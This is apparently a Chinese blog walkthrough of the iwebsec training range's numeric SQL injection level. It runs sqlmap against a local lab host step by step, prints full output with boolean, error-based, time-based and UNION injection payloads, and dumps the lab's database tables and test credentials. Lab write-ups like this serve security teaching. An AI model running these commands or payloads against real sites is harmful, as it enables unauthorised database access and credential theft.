前言
- 在线靶场:点击此处即可到达靶场地址-->>>iwebsec
2.本地搭建:使用官方所介绍的方法 点击跳转官网
iwebsec官网
(1)docker hub下载,命令 docker pull iwebsec/iwebsec
(2)VMware虚拟机环境下载地址链接:https://pan.baidu.com/s/1ChCilzFPSedlA_Hv4NMkPA?pwd=0aib 提取码: 0aib
iwebsec靶场配套书籍《Web安全原理分析与实践》
这里更加推荐使用本地环境。
sql注入漏洞
SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
数字型注入
打开靶场注入点已给出
/01.php?id=1
sqlmap
使用sqlmap判断是否存在漏洞
sqlmap -u http://192.168.70.157/sqli/01.php?id=1
点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1
___
__H__
___ ___[(]_____ ___ ___ {1.2.3#stable}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:28:48
[21:28:48] [INFO] resuming back-end DBMS 'mysql'
[21:28:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:28:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:28:48] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:28:48
爆数据库名
记录sqlmap的使用方法
命令如下
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --dbs
点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.2.3#stable}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:24:43
[21:24:43] [INFO] resuming back-end DBMS 'mysql'
[21:24:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:24:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:24:43] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] iwebsec
[*] test
[21:24:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:24:43
爆数据库列名
这里以iwebsec为例
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec --tables
点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec --tables
___
__H__
___ ___[.]_____ ___ ___ {1.2.3#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:31:12
[21:31:12] [INFO] resuming back-end DBMS 'mysql'
[21:31:12] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:31:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:31:12] [INFO] fetching tables for database: 'iwebsec'
Database: iwebsec
[4 tables]
+-------+
| user |
| sqli |
| users |
| xss |
+-------+
[21:31:13] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:31:13
爆字段
这里可以看到有user,sqli,users,xss的表,接下来就是直接爆字段这里以user表为例
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user --columns
点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user --columns
___
__H__
___ ___[)]_____ ___ ___ {1.2.3#stable}
|_ -| . [.] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:33:41
[21:33:42] [INFO] resuming back-end DBMS 'mysql'
[21:33:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:33:42] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:33:42] [INFO] fetching columns for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(11) |
| password | varchar(255) |
| username | varchar(255) |
+----------+--------------+
[21:33:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:33:42
获取该字段中的信息
获取id账号密码信息
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user -C id,password,username --dump
点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 -D iwebsec -T user -C id,password,username --dump
___
__H__
___ ___[)]_____ ___ ___ {1.2.3#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:41:40
[21:41:40] [INFO] resuming back-end DBMS 'mysql'
[21:41:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:41:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:41:40] [INFO] fetching entries of column(s) 'id, password, username' for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | pass1 | user1 |
| 2 | pass2 | user2 |
| 3 | pass3 | user3 |
+----+----------+----------+
[21:41:40] [INFO] table 'iwebsec.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/user.csv'
[21:41:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:41:40
获取数据库所有用户信息
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --users
点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --users
___
__H__
___ ___[(]_____ ___ ___ {1.2.3#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:44:37
[21:44:37] [INFO] resuming back-end DBMS 'mysql'
[21:44:37] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:44:37] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:44:37] [INFO] fetching database users
database management system users [1]:
[*] 'iwebsec'@'localhost'
[21:44:37] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:44:37
直接枚举数据库信息
--current-db可以查看网站使用的当前数据库
sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --current-db --dump --batch
点击查看代码
root@kali:~# sqlmap -u http://192.168.70.157/sqli/01.php?id=1 --current-db --dump --batch
___
__H__
___ ___["]_____ ___ ___ {1.2.3#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 21:26:09
[21:26:09] [INFO] resuming back-end DBMS 'mysql'
[21:26:09] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)
Payload: id=1 OR NOT 1065=1065#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 5271 FROM(SELECT COUNT(*),CONCAT(0x71627a7a71,(SELECT (ELT(5271=5271,1))),0x716a786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x71627a7a71,0x664d786b4a5257647a414d49656d68724b4b4b6e726c544d79546d4d426a474b466c69777a6c6874,0x716a786271)-- mFMY
---
[21:26:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:26:09] [INFO] fetching current database
current database: 'iwebsec'
[21:26:09] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:26:09] [INFO] fetching current database
[21:26:09] [INFO] fetching tables for database: 'iwebsec'
[21:26:09] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[21:26:09] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+------------------------------------------------------+----------+
| id | email | username | password |
+----+-----------------------+------------------------------------------------------+----------+
| 1 | [email protected] | user1 | pass1 |
| 2 | [email protected] | user2 | pass2 |
| 3 | [email protected] | user3 | pass3 |
| 4 | [email protected] | admin | admin |
| 5 | [email protected] | 123 | 123 |
| 6 | [email protected] | ctfs' or updatexml(1,concat(0x7e,(version())),0)# | 123 |
| 7 | [email protected] | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# | 123456 |
+----+-----------------------+------------------------------------------------------+----------+
[21:26:09] [INFO] table 'iwebsec.sqli' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/sqli.csv'
[21:26:09] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[21:26:09] [INFO] fetching entries for table 'xss' in database 'iwebsec'
Database: iwebsec
Table: xss
[1 entry]
+----+---------+
| id | name |
+----+---------+
| 1 | iwebsec |
+----+---------+
[21:26:09] [INFO] table 'iwebsec.xss' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/xss.csv'
[21:26:09] [INFO] fetching columns for table 'user' in database 'iwebsec'
[21:26:09] [INFO] fetching entries for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | username | password |
+----+----------+----------+
| 1 | user1 | pass1 |
| 2 | user2 | pass2 |
| 3 | user3 | pass3 |
+----+----------+----------+
[21:26:09] [INFO] table 'iwebsec.`user`' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/user.csv'
[21:26:09] [INFO] fetching columns for table 'users' in database 'iwebsec'
[21:26:09] [INFO] fetching entries for table 'users' in database 'iwebsec'
Database: iwebsec
Table: users
[1 entry]
+-------+----------+-------------+
| role | username | password |
+-------+----------+-------------+
| admin | orange | mall123mall |
+-------+----------+-------------+
[21:26:09] [INFO] table 'iwebsec.users' dumped to CSV file '/root/.sqlmap/output/192.168.70.157/dump/iwebsec/users.csv'
[21:26:09] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.70.157'
[*] shutting down at 21:26:09